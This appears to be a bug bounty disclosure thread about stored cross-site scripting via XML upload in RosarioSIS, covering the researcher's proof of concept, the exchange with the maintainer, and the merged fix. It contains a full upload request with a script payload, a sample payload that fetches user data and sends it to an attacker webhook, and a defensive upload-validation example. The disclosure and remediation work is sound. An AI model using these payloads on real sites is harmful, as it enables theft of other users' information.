Cross-site scripting - Stored via upload xml file in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

When a user uploads a file with the XML extension, which is in the white-list, the server stores the XML file at assets/PortalNotesFiles/, so we can access it directly and execute JavaScript code.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2762
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.xml"
Content-Type: image/png

<html>
    <head></head>
    <body>
        <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
        <info>
          <name>
            <value>123</value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC images

[screenshots not reproduced]

Impact

This vulnerability allows arbitrary JavaScript code execution, stealing the user's cookie, etc.

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a month ago
Nhien.IT modified the report
a month ago
Nhien.IT
a month ago

Researcher


Hi @admin, can you contact the maintainer?

We have contacted a member of the francoisjacquet/rosariosis team and are waiting to hear back a month ago
Jamie Slome
a month ago

Admin


@nhienit2010 - contact has been established with the maintainer, as you can see in the status message above 👍

Let me know if you have any further questions.

François
a month ago

Maintainer


Hello @nhienit2010

Thank you for reporting the issue. The xml file is opened in a new browser tab. As far as my test goes, I was not able to retrieve the session cookie. Were you? If so, please update your example.

François
a month ago

Maintainer


Oh, the cookie is set to HttpOnly so it cannot be retrieved.

Now, being in a new tab, the xml file is executed by the browser just like any other file you might open or find on the Internet.

Could you please explain how this could leak user session or other info related to RosarioSIS?

Nhien.IT
a month ago

Researcher


Hello @maintainer,

Because the XML file is uploaded to your website, under the same-origin policy the JavaScript code in the malicious XML can fetch other users' information and send it to the attacker's host; sometimes this vulnerability allows the attacker to perform HTTP requests in the victim's browser.

Sample payload

<html>
    <head></head>
    <body>
        <info>
          <name>
<value><![CDATA[<script>fetch("https://www.rosariosis.org/demonstration/Modules.php?modname=Users/User.php").then(r=>r.text()).then(d=>navigator.sendBeacon("https://<my-webhook>", d))</script>]]></value>
          </name>
            <description>
              <value>Hello</value>
            </description>
            <url>
              <value>http://google.com</value>
            </url>
        </info>
    </body>
</html>

Image PoC

[screenshot not reproduced]
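An added example (not RosarioSIS code, and not the fix the maintainer merged) of the server-side upload check that would reject the request above (filename "aaa.xml" declared as image/png, body is XHTML carrying a script) and of the response headers that keep a stored attachment from rendering in the site's origin, which is the same-origin point made in the reply above. The allow-list, the magic-byte table and the function names are assumptions.

```python
# Added example, not RosarioSIS code: validate attachment uploads and serve stored
# files as downloads so an uploaded XML/HTML/SVG never runs as a page in the origin.
import os
import re

# Constructed allow-list for portal note attachments: only formats the browser
# will not interpret as a document (xml, xhtml, svg, html deliberately excluded).
ALLOWED_EXTENSIONS = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "docx", "xlsx"}

# Magic bytes a declared MIME type must actually start with (assumed table).
MAGIC = {
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/jpeg": b"\xff\xd8\xff",
    "image/gif": b"GIF8",
    "application/pdf": b"%PDF",
}

# Markup that makes a file browser-executable once it is served inline,
# including the XHTML namespace trick used in the PoC (<a:script xmlns:a=...>).
ACTIVE_MARKUP = re.compile(
    rb"<\?xml|<!doctype\s+html|<html|<svg|<script|xmlns(:\w+)?=.http://www\.w3\.org/1999/xhtml",
    re.IGNORECASE,
)

def validate_upload(filename: str, declared_mime: str, data: bytes):
    """Return (accepted, reason): reject on extension, MIME/magic mismatch or active markup."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    magic = MAGIC.get(declared_mime)
    if magic is not None and not data.startswith(magic):
        return False, f"content does not match declared {declared_mime}"
    if ACTIVE_MARKUP.search(data[:4096]):
        return False, "active markup (xml/html/svg/script) in file body"
    return True, "ok"

def download_headers(stored_name: str) -> dict:
    """Headers for serving any stored attachment: force download, forbid sniffing."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(stored_name))
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }

if __name__ == "__main__":
    # Constructed body mirroring the PoC: XHTML-namespaced script inside "XML".
    poc = b'<html><body><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script></body></html>'
    print(validate_upload("aaa.xml", "image/png", poc))
    print(validate_upload("aaa.png", "image/png", poc))
    print(download_headers("aaa.xml"))
```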

François Jacquet validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet confirmed that a fix has been merged on 90842c a month ago
François Jacquet has been awarded the fix bounty
FileUpload.fnc.php#L842 has been validated